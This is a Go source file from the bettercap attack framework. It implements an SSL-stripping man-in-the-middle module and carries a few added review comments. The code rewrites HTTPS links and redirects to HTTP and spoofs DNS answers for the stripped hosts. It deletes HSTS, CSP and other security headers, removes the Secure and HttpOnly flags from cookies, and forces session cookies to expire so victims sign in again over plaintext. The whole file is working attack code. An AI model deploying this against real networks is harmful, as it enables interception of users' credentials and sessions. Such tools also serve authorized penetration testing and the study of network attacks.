// http_proxy_base_sslstriper.go
  1. package http_proxy
  2. import (
  3. "io/ioutil"
  4. "net/http"
  5. "net/url"
  6. "regexp"
  7. "strconv"
  8. "strings"
  9. "github.com/bettercap/bettercap/log"
  10. "github.com/bettercap/bettercap/modules/dns_spoof"
  11. "github.com/bettercap/bettercap/network"
  12. "github.com/bettercap/bettercap/session"
  13. "github.com/elazarl/goproxy"
  14. "github.com/google/gopacket"
  15. "github.com/google/gopacket/layers"
  16. "github.com/google/gopacket/pcap"
  17. "github.com/evilsocket/islazy/tui"
  18. "golang.org/x/net/idna"
  19. )
  20. var (
  21. httpsLinksParser = regexp.MustCompile(`https://[^"'/]+`)
  22. domainCookieParser = regexp.MustCompile(`; ?(?i)domain=.*(;|$)`)
  23. flagsCookieParser = regexp.MustCompile(`; ?(?i)(secure|httponly)`)
  24. )
// SSLStripper downgrades HTTPS to HTTP for proxied clients: it tracks
// stripped hostnames, rewrites redirects/links/cookies, and answers DNS
// queries for stripped hosts via a raw pcap capture.
type SSLStripper struct {
	enabled       bool                 // whether stripping is currently active
	session       *session.Session     // owning bettercap session (interface, targets)
	cookies       *CookieTracker       // cookies already seen per client/host
	hosts         *HostTracker         // stripped-hostname <-> original-hostname map
	handle        *pcap.Handle         // raw capture handle, nil until Enable(true)
	pktSourceChan chan gopacket.Packet // packet stream consumed by the capture goroutine
}
  33. func NewSSLStripper(s *session.Session, enabled bool) *SSLStripper {
  34. strip := &SSLStripper{
  35. enabled: false,
  36. cookies: NewCookieTracker(),
  37. hosts: NewHostTracker(),
  38. session: s,
  39. handle: nil,
  40. }
  41. strip.Enable(enabled)
  42. return strip
  43. }
// Enabled reports whether SSL stripping is currently active.
func (s *SSLStripper) Enabled() bool {
	return s.enabled
}
  47. func (s *SSLStripper) onPacket(pkt gopacket.Packet) {
  48. typeEth := pkt.Layer(layers.LayerTypeEthernet)
  49. typeUDP := pkt.Layer(layers.LayerTypeUDP)
  50. if typeEth == nil || typeUDP == nil {
  51. return
  52. }
  53. eth := typeEth.(*layers.Ethernet)
  54. dns, parsed := pkt.Layer(layers.LayerTypeDNS).(*layers.DNS)
  55. if parsed && dns.OpCode == layers.DNSOpCodeQuery && len(dns.Questions) > 0 && len(dns.Answers) == 0 {
  56. udp := typeUDP.(*layers.UDP)
  57. for _, q := range dns.Questions {
  58. domain := string(q.Name)
  59. original := s.hosts.Unstrip(domain)
  60. if original != nil && original.Address != nil {
  61. redir, who := dns_spoof.DnsReply(s.session, 1024, pkt, eth, udp, domain, original.Address, dns, eth.SrcMAC)
  62. if redir != "" && who != "" {
  63. log.Debug("[%s] Sending spoofed DNS reply for %s %s to %s.", tui.Green("dns"), tui.Red(domain), tui.Dim(redir), tui.Bold(who))
  64. }
  65. }
  66. }
  67. }
  68. }
// Enable turns SSL stripping on or off. On the first activation it opens
// a pcap capture handle on the session interface, filters it down to UDP
// traffic, and spawns a goroutine that feeds every captured packet to
// onPacket until stripping is disabled.
//
// NOTE(review): Capture/SetBPFFilter failures panic instead of being
// returned to the caller — confirm this is the intended failure mode.
// NOTE(review): s.enabled and s.handle are read and written from both
// this method and the capture goroutine with no synchronization; looks
// like a tolerated benign race — verify.
func (s *SSLStripper) Enable(enabled bool) {
	s.enabled = enabled

	if enabled && s.handle == nil {
		var err error

		if s.handle, err = network.Capture(s.session.Interface.Name()); err != nil {
			panic(err)
		}

		// only UDP is needed (DNS spoofing of stripped hosts).
		if err = s.handle.SetBPFFilter("udp"); err != nil {
			panic(err)
		}

		go func() {
			// release the capture handle once the loop exits so a later
			// Enable(true) can reopen it.
			defer func() {
				s.handle.Close()
				s.handle = nil
			}()

			for s.enabled {
				src := gopacket.NewPacketSource(s.handle, s.handle.LinkType())
				s.pktSourceChan = src.Packets()
				for packet := range s.pktSourceChan {
					if !s.enabled {
						break
					}
					s.onPacket(packet)
				}
			}
		}()
	}
}
  97. func (s *SSLStripper) isContentStrippable(res *http.Response) bool {
  98. for name, values := range res.Header {
  99. for _, value := range values {
  100. if name == "Content-Type" {
  101. return strings.HasPrefix(value, "text/") || strings.Contains(value, "javascript")
  102. }
  103. }
  104. }
  105. return false
  106. }
  107. func (s *SSLStripper) stripURL(url string) string {
  108. return strings.Replace(url, "https://", "http://", 1)
  109. }
  110. // sslstrip preprocessing, takes care of:
  111. //
  112. // - handling stripped domains
  113. // - making unknown session cookies expire
  114. func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
  115. if !s.enabled {
  116. return
  117. }
  118. // handle stripped domains
  119. original := s.hosts.Unstrip(req.Host)
  120. if original != nil {
  121. log.Info("[%s] Replacing host %s with %s in request from %s and transmitting HTTPS", tui.Green("sslstrip"), tui.Bold(req.Host), tui.Yellow(original.Hostname), req.RemoteAddr)
  122. req.Host = original.Hostname
  123. req.URL.Host = original.Hostname
  124. req.Header.Set("Host", original.Hostname)
  125. req.URL.Scheme = "https"
  126. }
  127. if !s.cookies.IsClean(req) {
  128. // check if we need to redirect the user in order
  129. // to make unknown session cookies expire
  130. log.Info("[%s] Sending expired cookies for %s to %s", tui.Green("sslstrip"), tui.Yellow(req.Host), req.RemoteAddr)
  131. s.cookies.Track(req)
  132. redir = s.cookies.Expire(req)
  133. }
  134. return
  135. }
  136. func (s *SSLStripper) fixCookies(res *http.Response) {
  137. origHost := res.Request.URL.Hostname()
  138. strippedHost := s.hosts.Strip(origHost)
  139. if strippedHost != nil && strippedHost.Hostname != origHost && res.Header["Set-Cookie"] != nil {
  140. // get domains from hostnames
  141. if origParts, strippedParts := strings.Split(origHost, "."), strings.Split(strippedHost.Hostname, "."); len(origParts) > 1 && len(strippedParts) > 1 {
  142. origDomain := origParts[len(origParts)-2] + "." + origParts[len(origParts)-1]
  143. strippedDomain := strippedParts[len(strippedParts)-2] + "." + strippedParts[len(strippedParts)-1]
  144. log.Info("[%s] Fixing cookies on %s", tui.Green("sslstrip"), tui.Bold(strippedHost.Hostname))
  145. cookies := make([]string, len(res.Header["Set-Cookie"]))
  146. // replace domain and strip "secure" flag for each cookie
  147. for i, cookie := range res.Header["Set-Cookie"] {
  148. domainIndex := domainCookieParser.FindStringIndex(cookie)
  149. if domainIndex != nil {
  150. cookie = cookie[:domainIndex[0]] + strings.Replace(cookie[domainIndex[0]:domainIndex[1]], origDomain, strippedDomain, 1) + cookie[domainIndex[1]:]
  151. }
  152. cookies[i] = flagsCookieParser.ReplaceAllString(cookie, "")
  153. }
  154. res.Header["Set-Cookie"] = cookies
  155. s.cookies.Track(res.Request)
  156. }
  157. }
  158. }
  159. func (s *SSLStripper) fixResponseHeaders(res *http.Response) {
  160. res.Header.Del("Content-Security-Policy-Report-Only")
  161. res.Header.Del("Content-Security-Policy")
  162. res.Header.Del("Strict-Transport-Security")
  163. res.Header.Del("Public-Key-Pins")
  164. res.Header.Del("Public-Key-Pins-Report-Only")
  165. res.Header.Del("X-Frame-Options")
  166. res.Header.Del("X-Content-Type-Options")
  167. res.Header.Del("X-WebKit-CSP")
  168. res.Header.Del("X-Content-Security-Policy")
  169. res.Header.Del("X-Download-Options")
  170. res.Header.Del("X-Permitted-Cross-Domain-Policies")
  171. res.Header.Del("X-Xss-Protection")
  172. res.Header.Set("Allow-Access-From-Same-Origin", "*")
  173. res.Header.Set("Access-Control-Allow-Origin", "*")
  174. res.Header.Set("Access-Control-Allow-Methods", "*")
  175. res.Header.Set("Access-Control-Allow-Headers", "*")
  176. }
  177. func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
  178. if !s.enabled {
  179. return
  180. }
  181. s.fixResponseHeaders(res)
  182. orig := res.Request.URL
  183. origHost := orig.Hostname()
  184. // is the server redirecting us?
  185. if res.StatusCode != 200 {
  186. // extract Location header
  187. if location, err := res.Location(); location != nil && err == nil {
  188. newHost := location.Host
  189. newURL := location.String()
  190. // are we getting redirected from http to https?
  191. if orig.Scheme == "http" && location.Scheme == "https" {
  192. log.Info("[%s] Got redirection from HTTP to HTTPS: %s -> %s", tui.Green("sslstrip"), tui.Yellow("http://"+origHost), tui.Bold("https://"+newHost))
  193. // strip the URL down to an alternative HTTP version and save it to an ASCII Internationalized Domain Name
  194. strippedURL := s.stripURL(newURL)
  195. parsed, _ := url.Parse(strippedURL)
  196. hostStripped := parsed.Hostname()
  197. hostStripped, _ = idna.ToASCII(hostStripped)
  198. s.hosts.Track(newHost, hostStripped)
  199. res.Header.Set("Location", strippedURL)
  200. }
  201. }
  202. }
  203. // if we have a text or html content type, fetch the body
  204. // and perform sslstripping
  205. if s.isContentStrippable(res) {
  206. raw, err := ioutil.ReadAll(res.Body)
  207. if err != nil {
  208. log.Error("Could not read response body: %s", err)
  209. return
  210. }
  211. body := string(raw)
  212. urls := make(map[string]string)
  213. matches := httpsLinksParser.FindAllString(body, -1)
  214. for _, u := range matches {
  215. // make sure we only strip valid URLs
  216. if parsed, _ := url.Parse(u); parsed != nil {
  217. // strip the URL down to an alternative HTTP version
  218. urls[u] = s.stripURL(u)
  219. }
  220. }
  221. nurls := len(urls)
  222. if nurls > 0 {
  223. plural := "s"
  224. if nurls == 1 {
  225. plural = ""
  226. }
  227. log.Info("[%s] Stripping %d SSL link%s from %s", tui.Green("sslstrip"), nurls, plural, tui.Bold(res.Request.Host))
  228. }
  229. for u, stripped := range urls {
  230. log.Debug("Stripping url %s to %s", tui.Bold(u), tui.Yellow(stripped))
  231. body = strings.Replace(body, u, stripped, -1)
  232. // save stripped host to an ASCII Internationalized Domain Name
  233. parsed, _ := url.Parse(u)
  234. hostOriginal := parsed.Hostname()
  235. parsed, _ = url.Parse(stripped)
  236. hostStripped := parsed.Hostname()
  237. hostStripped, _ = idna.ToASCII(hostStripped)
  238. s.hosts.Track(hostOriginal, hostStripped)
  239. }
  240. res.Header.Set("Content-Length", strconv.Itoa(len(body)))
  241. // fix cookies domain + strip "secure" + "httponly" flags
  242. s.fixCookies(res)
  243. // reset the response body to the original unread state
  244. // but with just a string reader, this way further calls
  245. // to ioutil.ReadAll(res.Body) will just return the content
  246. // we stripped without downloading anything again.
  247. res.Body = ioutil.NopCloser(strings.NewReader(body))
  248. }
  249. }